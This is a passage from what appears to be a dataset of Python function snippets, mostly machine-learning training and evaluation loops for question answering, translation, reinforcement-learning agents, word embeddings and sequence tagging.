results...')\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n scores_diff_json = collections.OrderedDict()\n for features in dev_data_features:\n results = all_results[features[0].example_id]\n example_qas_id = features[0].qas_id\n score_diff, best_non_null_entry, nbest_json = predict_extended(\n features=features, results=results, n_best_size=args.n_best_size,\n max_answer_length=args.max_answer_length, start_n_top=args.start_top_n,\n end_n_top=args.end_top_n)\n scores_diff_json[example_qas_id] = score_diff\n all_predictions[example_qas_id] = best_non_null_entry\n all_nbest_json[example_qas_id] = nbest_json\n\n output_prediction_file = os.path.join(args.output_dir, 'predictions.json')\n output_nbest_file = os.path.join(args.output_dir, 'nbest_predictions.json')\n output_null_log_odds_file = os.path.join(args.output_dir, 'null_odds.json')\n\n with open(output_prediction_file, 'w') as writer:\n writer.write(json.dumps(all_predictions, indent=4) + '\\n')\n with open(output_nbest_file, 'w') as writer:\n writer.write(json.dumps(all_nbest_json, indent=4) + '\\n')\n with open(output_null_log_odds_file, 'w') as writer:\n writer.write(json.dumps(scores_diff_json, indent=4) + '\\n')\n\n if os.path.exists(sys.path[0] + '/evaluate-v2.0.py'):\n arguments = [\n dev_data_path, output_prediction_file, '--na-prob-thresh',\n str(args.null_score_diff_threshold)\n ]\n if args.version_2:\n arguments += ['--na-prob-file', output_null_log_odds_file]\n subprocess.call([sys.executable, sys.path[0] + '/evaluate-v2.0.py'] + arguments)\n else:\n log.info('Please download evaluate-v2.0.py to get evaluation results for SQuAD. '\n 'Check index.rst for the detail.')", "def train(args: Dict):\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print('use device: %s' % device)\n\n train_data_src = read_corpus(args['--train-src'], source='src')\n train_data_tgt = read_corpus(args['--train-tgt'], source='tgt')\n\n dev_data_src = read_corpus(args['--dev-src'], source='src')\n dev_data_tgt = read_corpus(args['--dev-tgt'], source='tgt')\n\n train_data = list(zip(train_data_src, train_data_tgt))\n dev_data = list(zip(dev_data_src, dev_data_tgt))\n\n train_batch_size = int(args['--batch-size'])\n N = int(args['--N'])\n d_model = int(args['--d_model'])\n d_ff = int(args['--d_ff'])\n h = int(args['--h'])\n dropout = float(args['--dropout'])\n\n valid_niter = int(args['--valid-niter'])\n log_every = int(args['--log-every'])\n model_save_path = args['--save-to']\n lr=float(args['--lr'])\n\n vocab = Vocab.load(args['--vocab'])\n vocab_mask = torch.ones(len(vocab.tgt))\n vocab_mask[vocab.tgt['<pad>']] = 0\n\n model = make_model(len(vocab.src), len(vocab.tgt), N, d_model, d_ff, h, dropout)\n model = model.to(device)\n\n optimizer = NoamOpt(model.src_embed[0].d_model, 1, 400,\n torch.optim.Adam(model.parameters(), lr=lr, betas=(0.9, 0.98), eps=1e-9))\n\n num_trial = 0\n train_iter = patience = cum_loss = report_loss = cum_tgt_words = report_tgt_words = 0\n cum_exmaples = report_examples = epoch = valid_num = 0\n hist_valid_scores = []\n train_time = begin_time = time.time()\n print('begin Maximum Likelihood Training')\n\n while True:\n epoch += 1\n for src_sents, tgt_sents in batch_iter(train_data, batch_size=train_batch_size, shuffle=True):\n train_iter += 1\n optimizer.zero_grad()\n batch_size = len(src_sents)\n\n example_losses = - model(src_sents, tgt_sents) #(batch_size,)\n batch_loss = example_losses.sum()", "def run_step(self):\n self.hooked_sess.run(self.train_op)", "def run_training(self):\n while not rospy.is_shutdown():\n\n # 1. collect rollouts\n # see subscriber callback function: retrieve_rollout()\n\n # 2. Check buffer size and update policy\n if len(self.buffer) >= self.batch_size:\n # Toggle state and destroy subscriber\n self.toggleState()\n self.unsubscribe()\n time.sleep(1.0)\n # Update policy weights with PPO algorithm\n self.run_optimization()\n self.buffer.flush()\n time.sleep(1.0)\n # Toggle state and initialize subscriber\n self.initialize_subscriber()\n time.sleep(1.0)\n self.toggleState()\n # Evaluate current policy\n self.evaluate_policy()", "def trainAgent(self):\r\n\t\tfor episode in range(self.TOT_EPISODES):\r\n\t\t\t#reset environment, stacked frames every episode.\r\n\t\t\tstate = self.env.reset()\r\n\t\t\trewards = 0\r\n\t\t\t#preprocess and stack the frame/state.\r\n\t\t\tstate, self.stacked_frames = stack_frames(self.stack_size,\r\n\t\t\t\t\t\t\t\t\tself.stacked_frames, state, True)\r\n\t\t\t\r\n\t\t\tfor step in range(self.MAX_STEPS):\r\n\t\t\t#for every step in episode:\r\n\t\t\t\r\n\t\t\t\tif (step%100==0):\r\n\t\t\t\t\tprint(\"Episode No.: \", episode, \"Step No.: \", step)\r\n\t\t\t\t\r\n\t\t\t\t#agent acts - explores or exploitation of the model\r\n\t\t\t\taction = self.dqn.predictAction(state)\r\n\t\t\t\t#reduce epsilon for more exploitation later.\r\n\t\t\t\tself.dqn.decayEpsilon()\r\n\t\t\t\t#Perform the action and get the next_state, reward, and done vals.\r\n\t\t\t\tnext_state, reward, done, _ = self.env.step(action)\r\n\t\t\t\t#append this state to the frame. Pass the previous stacked frame.\r\n\t\t\t\tnext_state, self.stacked_frames = stack_frames(self.stack_size,\r\n\t\t\t\t\t\t\t\t\t\tself.stacked_frames, next_state, False)\r\n\t\t\t\trewards+=reward\r\n\t\t\t\t\r\n\t\t\t\t#add this experience into memory (experience buffer)\r\n\t\t\t\tself.dqn.remember(state, action, reward, next_state, done)\r\n\t\t\t\t\r\n\t\t\t\tstate = next_state\r\n\t\t\t\t\r\n\t\t\t\tif done:\r\n\t\t\t\t\tprint(\"took %d steps\" %step)\r\n\t\t\t\t\tprint(\"Earned a total of reward equal to \", rewards)\r\n\t\t\t\t\tbreak\r\n\t\t\t\r\n\t\t\t\t# TRAIN\r\n\t\t\t\tself.dqn.replay()\r\n\t\t\t\t#sync target_model and model weights every 10k steps.\r\n\t\t\t\tif step % 10000 == 9999:\r\n\t\t\t\t\tself.dqn.target_train()\r\n\t\t\t\r\n\t\t\t# Save the network every 1000 iterations\r\n\t\t\tif episode % 5 == 4:\r\n\t\t\t\tprint(\"Saving Network\")\r\n\t\t\t\tself.dqn.save_network(self.path)", "def fit(self, env, num_iteration, do_train=False):\n\n #s, a, r, new_s, d = get_multi_step_sample(one_step_memory, self.gamma, self.num_step)\n #self.replay_memory.append((s, a, r, new_s, d))\n # epsilon update\n num_env = env.num_process\n env.reset()\n\n for t in range(0, num_iteration, num_env):\n self.global_step += 1\n #print(\"Global_step: {}\".format(self.global_step))\n old_state, action, reward, new_state, is_terminal = self.get_multi_step_sample(env)\n self.replay_memory.append(old_state, action, reward, new_state, is_terminal)\n\n \"\"\"\n Epsilon update\n epsilon begin 1.0, end up 0.1\n FIX\n \"\"\"\n\n self.epsilon = self.epsilon+ num_env*self.epsilon_increment if self.epsilon > EPSILON_END else EPSILON_END\n num_update = sum([1 if i%self.update_freq == 0 else 0 for i in range(t, t+num_env)])\n if do_train:\n for _ in range(num_update):\n\n if self.per == 1:\n (old_state_list, action_list, reward_list, new_state_list, is_terminal_list), \\\n idx_list, p_list, sum_p, count = self.replay_memory.sample(self.batch_size)\n else:\n old_state_list, action_list, reward_list, new_state_list, is_terminal_list \\\n = self.replay_memory.sample(self.batch_size)\n\n feed_dict = {self.target_s: new_state_list.astype(np.float32)/255. ,\n self.s : old_state_list.astype(np.float32)/255.,\n self.a_ph: list(enumerate(action_list)),\n self.r_ph: np.array(reward_list).astype(np.float32),\n self.d_ph: np.array(is_terminal_list).astype(np.float32),\n }\n\n if self.double:\n action_chosen_by_online = self.sess.run(self.a,\n feed_dict={\n self.s: new_state_list.astype(np.float32)/255.})\n feed_dict[self.a_for_new_state_ph] = list(enumerate(action_chosen_by_online))\n\n if self.per == 1:\n # Annealing weight beta\n feed_dict[self.loss_weight_ph] = (np.array(p_list) * count / sum_p) ** (-self.beta)\n error, _ = self.sess.run([self.error_op, self.train_op], feed_dict=feed_dict)\n self.replay_memory.update(idx_list, error)\n\n else:\n self.sess.run(self.train_op, feed_dict=feed_dict)\n\n self.update_time += 1\n\n if self.beta < BETA_END:\n self.beta += self.beta_increment\n\n if (self.update_time)%self.target_update_freq == 0 :\n #print(\"Step: {} \".format(self.update_time) + \"target_network update\")\n self.sess.run([self.target_update])\n #print(\"Step: {} \".format(self.update_freq) + \"Network save\")\n self.save_model()", "def _run_epoch(sess, model, args, data, index=0, tb_summaries=None,\n id_to_word=None, train_op=None, verbose=False):\n epoch_start_time = time.time()\n # total cost and number of words evaluated in this epoch\n costs, total_words = 0.0, 0.0\n # epoch size is number of batches in each epoch\n epoch_size = (len(data[index]) - 1) // model.config['batch_size']\n state = sess.run(model.initial_state)\n\n # iterate through batches\n for step, (x, y) in enumerate(data_reader.batch_iterator(\n data[index], model.config['batch_size'])):\n # return these parameters after running TF session\n fetches = {\n 'cost': model.cost[index],\n 'final_state': model.final_state,\n 'seq_len': model.seq_len\n }\n # only train model has optimizer operation\n if train_op is not None:\n fetches['train_op'] = train_op[index]\n\n # create dict to feed input, targets, and rnn into TF session\n feed_dict = utils.create_feed_dict(model, args, x, y, state)\n # run all parameters in fetches dict\n vals = sess.run(fetches, feed_dict)\n\n costs += vals['cost']\n # number of words evaluated\n total_words += np.sum(vals['seq_len'])\n # use perplexity to evaluate language models\n perplexity = np.exp(costs / total_words)\n\n if verbose and step % (epoch_size // 2) == 1:\n # display perplexity and top word predictions for sequence\n _display_epoch_metrics(step, epoch_size, perplexity, total_words,\n epoch_start_time, args, model, sess,\n index, feed_dict, vals, id_to_word, y)\n\n # generate sample text while training to monitor progress\n if args.display_text == 'True' and model.name == 'Train':\n generate.generate_text(sess, model, id_to_word, train_ind=index)\n\n # write TensorBoard summaries for Train/Valid\n if args.save_path != '' and model.name != 'Test':\n summary = sess.run(tb_summaries.summary_op,\n {tb_summaries.ppl_summary: perplexity})\n model.file_writer.add_summary(summary, get_or_create_global_step().eval())\n\n return perplexity", "def train(self, examples):\n # iterate over our sentences in the examples\n for sentence in examples:\n # some testing prints\n # print('---------------------------')\n # print(sentence)\n # print('---------------------------')\n # get every tuple in the sentence\n for i in range(len(sentence)):\n # seperate the word and the state\n word = sentence[i][0]\n state = sentence[i][1]\n # add our word and state to our set of all words and states\n self.vocab.add(word)\n self.states.add(state)\n # if we are at the first word in the sentence need to\n # increment the number of times this tag appeared first in a sentence\n if i == 0:\n self.pi[state] += 1\n # else we need to increment the number of times the\n # current tag was preceeded by the tag before it\n else:\n if sentence[i - 1][1] not in self.transitions:\n self.transitions[sentence[i - 1][1]] = Counter()\n self.transitions[sentence[i - 1][1]][state] += 1\n # now we increment the number of times the word had this tag\n if state not in self.emissions:\n self.emissions[state] = Counter()\n self.emissions[state][word] += 1\n # print(self.emissions)\n # print(self.transitions)\n # print(self.pi)\n # print('---------------------------')\n\n # now we store the counts we will need since during our iterations\n # the counts will change\n # this stores how many sentences we have\n # count(sentences)\n pi_val = sum(self.pi.values())\n # now we are going to get the counts of the tags\n # count(t_i)\n # we are using emissions because each tag occurs in it unlike\n # in transitions where the last tag is lost kind of\n for state in self.emissions.keys():\n # print(state, sum(self.emissions[state].values()))\n self.tag_count[state] = sum(self.emissions[state].values())\n # print('---------------------------')\n # now we do the probability of a sentence starting with each tag\n # count(t_i) / count(sentences)\n for state in self.pi:\n self.pi[state] /= pi_val\n # now we will calculate the probabilites that each tag proceeds the next tag\n # ie p(t_i | t_i-1) = count(t_i-1, t_i) / count(t_i-1)\n for prev_state in self.transitions:\n for state in self.transitions[prev_state]:\n # print(prev_state, state, self.transitions[prev_state][state])\n # print(prev_state, tag_count[prev_state])\n self.transitions[prev_state][state] /= self.tag_count[prev_state]\n # print(self.transitions[prev_state][state])\n # print('---------------------------')\n # and the probability of a word having the tag with laplace smoothing\n # p(w_i | t_i) = count(t_i, w_i) / count(t_i)\n for state in self.emissions:\n for word in self.emissions[state]:\n # print(state, word, self.emissions[state][word])\n # print(state, tag_count[state])\n self.emissions[state][word] = (self.emissions[state][word] + 1) / (\n self.tag_count[state] + len(self.vocab))\n # print(self.emissions[state][word])\n # print('---------------------------')\n # print(self.emissions)\n # print(self.transitions)\n # print(self.pi)\n # print('---------------------------')\n # print(len(self.vocab))\n # print(len(self.states))\n # print('---------------------------')", "def run():\n\n # Set up environment and agent\n e = Environment() # create environment (also adds some dummy traffic)\n a = e.create_agent(LearningAgent) # create agent\n e.set_primary_agent(a, enforce_deadline=False) # set agent to track\n\n # Now simulate it\n sim = Simulator(e, update_delay=0.0) # reduce update_delay to speed up simulation\n sim.run(n_trials=num_of_experiments) # press Esc or close pygame window to quit\n \n pd.Series(a.success).to_pickle('success_' + exp_id + '.pickle')\n a.Q_table.to_pickle('qtable_' + exp_id + '.pickle')\n pd.Series(a.q_delta_avg).to_pickle('convergence_' + exp_id + '.pickle')\n pd.Series(a.t_total).to_pickle('steps_' + exp_id + '.pickle')", "def main():\r\n preprocessor = DATA_PREPROCESSOR('shakespeare-corpus.txt')\r\n corpus = preprocessor.preprocess_data()\r\n plot(corpus)\r\n data, unique_vocab, word_to_idx = create_context(corpus)\r\n\r\n #train model- changed global variable if needed\r\n model=CBOW(len(unique_vocab), EMBEDDING_DIM, CONTEXT_SIZE)\r\n if USE_ADAM:\r\n print('Using adam as optimizer')\r\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n else:\r\n print('Using SGD as optimizer')\r\n optimizer = torch.optim.SGD(model.parameters(), lr=0.001)\r\n\r\n checkpoint_file ='checkpoint.pth'\r\n checkpoint_available= os.path.exists(checkpoint_file)\r\n if checkpoint_available:\r\n model, optimizer, current_epoch = reset_model_to_checkpoint(model, optimizer, checkpoint_file)\r\n else:\r\n print('no checkpoint found. initializing new model..\\n')\r\n current_epoch=0 \r\n\r\n executor = MODEL_EXECUTOR(model)\r\n if RESUME_TRAINING or not checkpoint_available:\r\n print('resuming training...\\n')\r\n import time\r\n start_time = time.time()\r\n cbow = executor.train(optimizer, data, unique_vocab, word_to_idx, current_epoch, checkpoint_file)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n else:\r\n print('pre-trained model loaded. no further training...\\n')\r\n\r\n # get two words similarity\r\n executor.test(unique_vocab,word_to_idx)\r\n\r\n show_closest_words(cbow, word_to_idx,unique_vocab)", "def main():\r\n # Read dataset.\r\n reader = DatasetReader\r\n train_filename = sys.argv[1]\r\n test_filename = train_filename.replace('_train_', '_dev_')\r\n term_index, tag_index, train_data, test_data = reader.ReadData(train_filename, test_filename)\r\n (train_terms, train_tags, train_lengths) = train_data\r\n (test_terms, test_tags, test_lengths) = test_data\r\n\r\n model = SequenceModel(train_tags.shape[1], len(term_index), len(tag_index))\r\n model.build_inference()\r\n model.build_training()\r\n for j in range(5):\r\n model.train_epoch(train_terms,train_tags, train_lengths)\r\n print('Finished epoch %i. Evaluating ...' % (j+1))\r\n model.evaluate(test_terms, test_tags, test_lengths)", "def training_phase(self):\r\n self.train_dataloader = self.get_dataloader(\r\n hdf_path=self.train_h5_path,\r\n data_description=\"training set\"\r\n )\r\n self.valid_dataloader = self.get_dataloader(\r\n hdf_path=self.valid_h5_path,\r\n data_description=\"validation set\"\r\n )\r\n\r\n self.get_ts_properties()\r\n\r\n self.initialize_output_files()\r\n\r\n start_epoch, end_epoch = self.define_model_and_optimizer()\r\n\r\n print(\"* Beginning training.\", flush=True)\r\n n_processed_batches = 0\r\n for epoch in range(start_epoch, end_epoch):\r\n\r\n self.current_epoch = epoch\r\n n_processed_batches = self.train_epoch(n_processed_batches=n_processed_batches)\r\n\r\n # evaluate model every `sample_every` epochs (not every epoch)\r\n if epoch % self.C.sample_every == 0:\r\n self.evaluate_model()\r\n else:\r\n util.write_model_status(score=\"NA\") # score not computed\r\n\r\n self.print_time_elapsed()", "def run_epoch(self):\n self.model_lr_scheduler.step()\n\n print(\"Training\")\n self.set_train()\n\n for batch_idx, inputs in enumerate(self.train_loader):\n\n before_op_time = time.time()\n\n outputs, losses = self.process_batch(inputs)\n\n self.model_optimizer.zero_grad()\n losses[\"loss\"].backward()\n self.model_optimizer.step()\n\n duration = time.time() - before_op_time\n\n # log less frequently after the first 2000 steps to save time & disk space\n early_phase = self.step < 2000\n late_phase = self.step % 2000 == 0\n\n if early_phase or late_phase:\n self.log_time(batch_idx, duration, losses[\"loss\"].cpu().data)\n\n if \"depth_gt\" in inputs:\n self.compute_depth_losses(inputs, outputs, losses)\n\n self.log(\"train\", inputs, outputs, losses)\n self.val()\n\n self.step += 1", "def training_step(self):\n self.iteration += 1\n # if not enough replay memories\n if self.iteration < self.params.min_replays:\n # skip training\n return\n # sample memories\n states_val, action_val, rewards, next_state_val, continues \\\n = (rl.tools.sample_memories(self.memory, self.params.batch_size))\n # evaluate the target q\n target_q = self.sess.run(self.graph.target_q_values, feed_dict={self.graph.states: next_state_val})\n # if using double q\n if self.params.double_q:\n online_q = self.sess.run(self.graph.online_q_values, feed_dict={self.graph.states: next_state_val})\n actions = np.argmax(online_q, axis=1)\n max_next_q_values = target_q[np.arange(actions.shape[0]), actions].reshape(-1, 1)\n else:\n max_next_q_values = np.max(target_q, axis=1, keepdims=True)\n # train the online DQN\n td_target = rewards + continues * self.params.discount_factor * max_next_q_values\n _, self.loss_val = self.sess.run([self.graph.training_op, self.graph.loss],\n feed_dict={self.graph.states: states_val, self.graph.actions: action_val,\n self.graph.td_target: td_target})\n # copy to target\n if self.params.copy_interval is None or (\n self.params.copy_interval and (self.iteration % self.params.copy_interval == 0)):\n self.sess.run(self.graph.copy_online_to_target)", "async def train(self):", "def run( self ):\n # ---- Startup/Shutdown ----\n with self:\n\n # ---- Optionally reload from previous run ----\n if self.config.neuron.reload:\n self.reload()\n else:\n self.checkpoint()\n\n # --- Run until n_epochs ----\n while self.epoch < self.config.neuron.n_epochs:\n try:\n # ---- Train state ----\n self.run_epoch()\n\n # ---- Set weights on chain ----\n self.set_mechanism_weights()\n\n # ---- Checkpoint state ----\n self.checkpoint()\n\n except KeyboardInterrupt:\n # --- User ended session ----\n break\n\n except Exception as e:\n # --- Unknown error ----\n logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())\n if self.config.neuron.restart_on_failure == True:\n logger.info('Restarting from last saved state.')\n self.reload()\n else:\n break", "def run(num_epochs, encoded_dim):\n # for patient_ in get_patient_ids():\n for patient_ in ['16']:\n print(\"Starting on index: \" + str(patient_))\n training_ae(num_epochs, encoded_dim, patient_, True)\n print(\"Completed \" + str(patient_) + \" reconstruction and encoding, saved test data to assess performance\")", "def train(self, session, train_examples, dev_examples, train_dir):\n\n # some free code to print out number of parameters in your model\n # it's always good to check!\n # you will also want to save your model parameters in train_dir\n # so that you can use your trained model to make predictions, or\n # even continue training\n\n tic = time.time()\n params = tf.trainable_variables()\n num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params))\n toc = time.time()\n logging.info(\"Number of params: %d (retreival took %f secs)\" % (num_params, toc - tic))\n\n if self.summary_flag:\n self.train_writer = tf.summary.FileWriter(self.summaries_dir + '/train', session.graph)\n\n logging.info(\"Train Loss File: {}\".format(self.train_loss_log))\n logging.info(\"Dev Loss File: {}\".format(self.dev_loss_log))\n best_score = 100000\n train_log = open(self.train_loss_log, \"w\")\n dev_log = open(self.dev_loss_log, \"w\")\n for epoch in range(self.n_epoch):\n print(\"Epoch {:} out of {:}\".format(epoch + 1, self.n_epoch))\n dev_score = self.run_epoch(session, train_examples, dev_examples, epoch, train_log)\n dev_log.write(\"{},{}\\n\".format(epoch + 1, dev_score))\n logging.info(\"Average Dev Cost: {}\".format(dev_score))\n logging.info(\"train F1 & EM\")\n f1, em = self.evaluate_answer(session, train_examples, self.rev_vocab, log = True)\n logging.info(\"Dev F1 & EM\")\n f1, em = self.evaluate_answer(session, dev_examples, self.rev_vocab, log = True)\n if dev_score < best_score:\n best_score = dev_score\n print(\"New best dev score! Saving model in {}\".format(train_dir + \"/\" + self.model_name))\n self.saver.save(session, train_dir + \"/\" + self.model_name)\n\n return best_score", "def run(self):\n self.__engine = engine = pyttsx.init()\n if self.__voice_id is not None:\n engine.setProperty('voice', self.__voice_id)\n engine.connect('finished-utterance', self.__next_utterance)\n engine.say('Starting voice process')\n engine.startLoop()", "def train(self, iters, n_episodes):\n for i in range(iters):\n self.self_play(n_episodes)\n self.learn()", "def evaluate(self, model, data):\n model.eval()\n\n loss = self.loss\n loss.reset()\n match = 0\n total = 0\n correct_spk = 0\n total_response = 0\n y_true = np.array([])\n y_pred = np.array([])\n\n device = None if torch.cuda.is_available() else -1\n batch_iterator = torchtext.data.BucketIterator(\n dataset=data, batch_size=self.batch_size,\n sort=True, sort_key=lambda x: len(x.src),\n device=device, train=False)\n tgt_vocab = data.fields[seq2seq.tgt_field_name].vocab\n pad = tgt_vocab.stoi[data.fields[seq2seq.tgt_field_name].pad_token]\n\n for batch in batch_iterator:\n input_variables, input_lengths = getattr(batch, seq2seq.src_field_name)\n target_variables, target_lengths = getattr(batch, seq2seq.tgt_field_name)\n spk_inputs = [getattr(batch, str(i)) for i in range(self.args.num_sentence)]\n\n decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(),\n target_variables, input_spk=spk_inputs)\n\n # Predict Speaker:\n target_spk = spk_inputs[-1]\n target_lengths = target_lengths.cpu().numpy()\n prob_per_spk = []\n for i in range(self.args.num_spk):\n spk_inputs_predict = Variable(torch.LongTensor(np.full((1,batch.batch_size), i)).clone())\n if self.args.cuda: spk_inputs_predict = spk_inputs_predict.cuda()\n spk_inputs_ = [getattr(batch, str(idx)) for idx in range(self.args.num_sentence-1)]\n spk_inputs_.append(spk_inputs_predict)\n decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(),\n target_variables, input_spk=spk_inputs_)\n prob_per_responce = []\n target = target_variables.transpose(0,1)\n for word, prob in zip(target[1:], decoder_outputs):\n word, prob = word.data.cpu().numpy(), prob.data.cpu().numpy()\n indices = zip(np.arange(len(word)), word)\n prob_per_word = [prob[i] for i in indices] # select the prob for *sentence_len* times\n prob_per_responce.append(prob_per_word)\n prob_per_spk.append([np.sum(prob_per_responce[:i]) for i in target_lengths])\n prob_per_spk = np.transpose(prob_per_spk) # output: (batch_size, num_spk), every element is the log prob for responce\n\n predicts = np.argmax(prob_per_spk, axis=1)\n correct_spk += (predicts == target_spk.data.cpu().numpy()).sum()\n total_response += len(batch.tgt[0])\n\n # Evaluation\n seqlist = other['sequence']\n for step, step_output in enumerate(decoder_outputs):\n target = target_variables[:, step + 1]\n loss.eval_batch(step_output.view(target_variables.size(0), -1), target)\n\n non_padding = target.ne(pad)\n correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().data[0]\n match += correct\n total += non_padding.sum().data[0]\n\n y_pred = np.append(y_pred, predicts)\n y_true = np.append(y_true, target_spk.data.cpu().numpy())\n\n print(y_pred.shape)\n\n print(accuracy_score(y_true, y_pred))\n print(confusion_matrix(y_true, y_pred))\n\n if total == 0:\n accuracy = float('nan')\n else:\n accuracy = match / total\n\n if total_response == 0:\n accuracy_spk = float('nan')\n else:\n accuracy_spk = correct_spk / total_response\n\n return loss.get_loss(), accuracy, accuracy_spk", "def run_one_step_simvodis(self):\n self.model_lr_scheduler.step()\n self.set_train()\n\n inputs = next(iter(self.train_loader))\n\n before_op_time = time.time()\n\n outputs, losses = self.process_batch(inputs)\n\n self.model_optimizer.zero_grad()\n losses[\"loss\"].backward()\n self.model_optimizer.step()\n\n duration = time.time() - before_op_time\n\n if self.arguments[\"iteration\"] % (self.opt.save_frequency // 2) == 0:\n self.log_time(self.arguments[\"iteration\"], duration, losses[\"loss\"].cpu().data)\n\n if \"depth_gt\" in inputs:\n self.compute_depth_losses(inputs, outputs, losses)\n\n self.log(\"train\", inputs, outputs, losses)\n self.val()\n\n self.step += 1", "def self_training(args):\n\n print('load pre-trained model from [%s]' % args.load_model, file=sys.stderr)\n params = torch.load(args.load_model, map_location=lambda storage, loc: storage)\n vocab = params['vocab']\n transition_system = params['transition_system']\n saved_args = params['args']\n saved_state = params['state_dict']\n\n # transfer arguments\n saved_args.cuda = args.cuda\n saved_args.save_to = args.save_to\n saved_args.train_file = args.train_file\n saved_args.unlabeled_file = args.unlabeled_file\n saved_args.dev_file = args.dev_file\n saved_args.load_decode_results = args.load_decode_results\n args = saved_args\n\n update_args(args)\n\n model = Parser(saved_args, vocab, transition_system)\n model.load_state_dict(saved_state)\n\n if args.cuda: model = model.cuda()\n model.train()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n print('load unlabeled data [%s]' % args.unlabeled_file, file=sys.stderr)\n unlabeled_data = Dataset.from_bin_file(args.unlabeled_file)\n\n print('load decoding results of unlabeled data [%s]' % args.load_decode_results, file=sys.stderr)\n decode_results = pickle.load(open(args.load_decode_results))\n\n labeled_data = Dataset.from_bin_file(args.train_file)\n dev_set = Dataset.from_bin_file(args.dev_file)\n\n print('Num. examples in unlabeled data: %d' % len(unlabeled_data), file=sys.stderr)\n assert len(unlabeled_data) == len(decode_results)\n self_train_examples = []\n for example, hyps in zip(unlabeled_data, decode_results):\n if hyps:\n hyp = hyps[0]\n sampled_example = Example(idx='self_train-%s' % example.idx,\n src_sent=example.src_sent,\n tgt_code=hyp.code,\n tgt_actions=hyp.action_infos,\n tgt_ast=hyp.tree)\n self_train_examples.append(sampled_example)\n print('Num. self training examples: %d, Num. labeled examples: %d' % (len(self_train_examples), len(labeled_data)),\n file=sys.stderr)\n\n train_set = Dataset(examples=labeled_data.examples + self_train_examples)\n\n print('begin training, %d training examples, %d dev examples' % (len(train_set), len(dev_set)), file=sys.stderr)\n print('vocab: %s' % repr(vocab), file=sys.stderr)\n\n epoch = train_iter = 0\n report_loss = report_examples = 0.\n history_dev_scores = []\n num_trial = patience = 0\n while True:\n epoch += 1\n epoch_begin = time.time()\n\n for batch_examples in train_set.batch_iter(batch_size=args.batch_size, shuffle=True):\n batch_examples = [e for e in batch_examples if len(e.tgt_actions) <= args.decode_max_time_step]\n\n train_iter += 1\n optimizer.zero_grad()\n\n loss = -model.score(batch_examples)\n # print(loss.data)\n loss_val = torch.sum(loss).data[0]\n report_loss += loss_val\n report_examples += len(batch_examples)\n loss = torch.mean(loss)\n\n loss.backward()\n\n # clip gradient\n if args.clip_grad > 0.:\n grad_norm = torch.nn.utils.clip_grad_norm(model.parameters(), args.clip_grad)\n\n optimizer.step()\n\n if train_iter % args.log_every == 0:\n print('[Iter %d] encoder loss=%.5f' %\n (train_iter,\n report_loss / report_examples),\n file=sys.stderr)\n\n report_loss = report_examples = 0.\n\n print('[Epoch %d] epoch elapsed %ds' % (epoch, time.time() - epoch_begin), file=sys.stderr)\n # model_file = args.save_to + '.iter%d.bin' % train_iter\n # print('save model to [%s]' % model_file, file=sys.stderr)\n # model.save(model_file)\n\n # perform validation\n print('[Epoch %d] begin validation' % epoch, file=sys.stderr)\n eval_start = time.time()\n eval_results = evaluation.evaluate(dev_set.examples, model, args, verbose=True)\n dev_acc = eval_results['accuracy']\n print('[Epoch %d] code generation accuracy=%.5f took %ds' % (epoch, dev_acc, time.time() - eval_start), file=sys.stderr)\n is_better = history_dev_scores == [] or dev_acc > max(history_dev_scores)\n history_dev_scores.append(dev_acc)\n\n if is_better:\n patience = 0\n model_file = args.save_to + '.bin'\n print('save currently the best model ..', file=sys.stderr)\n print('save model to [%s]' % model_file, file=sys.stderr)\n model.save(model_file)\n # also save the optimizers' state\n torch.save(optimizer.state_dict(), args.save_to + '.optim.bin')\n elif epoch == args.max_epoch:\n print('reached max epoch, stop!', file=sys.stderr)\n exit(0)\n elif patience < args.patience:\n patience += 1\n print('hit patience %d' % patience, file=sys.stderr)\n\n if patience == args.patience:\n num_trial += 1\n print('hit #%d trial' % num_trial, file=sys.stderr)\n if num_trial == args.max_num_trial:\n print('early stop!', file=sys.stderr)\n exit(0)\n\n # decay lr, and restore from previously best checkpoint\n lr = optimizer.param_groups[0]['lr'] * args.lr_decay\n print('load previously best model and decay learning rate to %f' % lr, file=sys.stderr)\n\n # load model\n params = torch.load(args.save_to + '.bin', map_location=lambda storage, loc: storage)\n model.load_state_dict(params['state_dict'])\n if args.cuda: model = model.cuda()\n\n # load optimizers\n if args.reset_optimizer:\n print('reset optimizer', file=sys.stderr)\n optimizer = torch.optim.Adam(model.inference_model.parameters(), lr=lr)\n else:\n print('restore parameters of the optimizers', file=sys.stderr)\n optimizer.load_state_dict(torch.load(args.save_to + '.optim.bin'))\n\n # set new lr\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n # reset patience\n patience = 0", "def loop(self, epochs, train_loader, val_loader, test_loader):\n\n self.all_epoch = epochs\n self._resume()\n\n for ep in range(self.cur_epoch, epochs + 1):\n self.cur_epoch = ep\n\n # conduct training, validation and test\n self.train_loss = self.train(train_loader)\n if ep % self.val_freq == 0:\n self.val_loss = self.val(val_loader)\n\n if ep % self.test_freq == 0:\n self.test_loss, rho, nmse = self.test(test_loader)\n else:\n rho, nmse = None, None\n\n # conduct saving, visualization and log printing\n self._loop_postprocessing(rho, nmse)", "def train_many(command, drinks = {'none':'none'}, flavors = ['none']):\n try:\n flavors.remove('flavor_strength') #don't need to train for flavor_strength\n except:\n pass\n stt = stt_google\n amounts = ['0.1', '-0.1']\n filenames = ['command_training.csv', 'drink_training.csv', 'flavor_training.csv']\n## if (drinks != {'none':'none'}):\n## filenames.append('drink_training1.csv')\n## if (flavors != ['none']):\n## filenames.append('flavor_training1.csv')\n csvfiles = []\n writers = []\n for index, filename in enumerate(filenames):\n currfile = open(filename, 'ab')\n csvfiles.append(currfile)\n writers.append(csv.writer(currfile))\n if(command == 'alter' and not ('bad' in flavors) and not ('good' in flavors)):\n currfile = open('amount_training.csv', 'ab')\n csvfiles.append(currfile)\n writers.append(csv.writer(currfile))\n # record instances until it doesn't interpret any text\n has_speech = True\n while(has_speech):\n for drink in drinks:\n if(not has_speech):\n break\n for flavor in flavors:\n 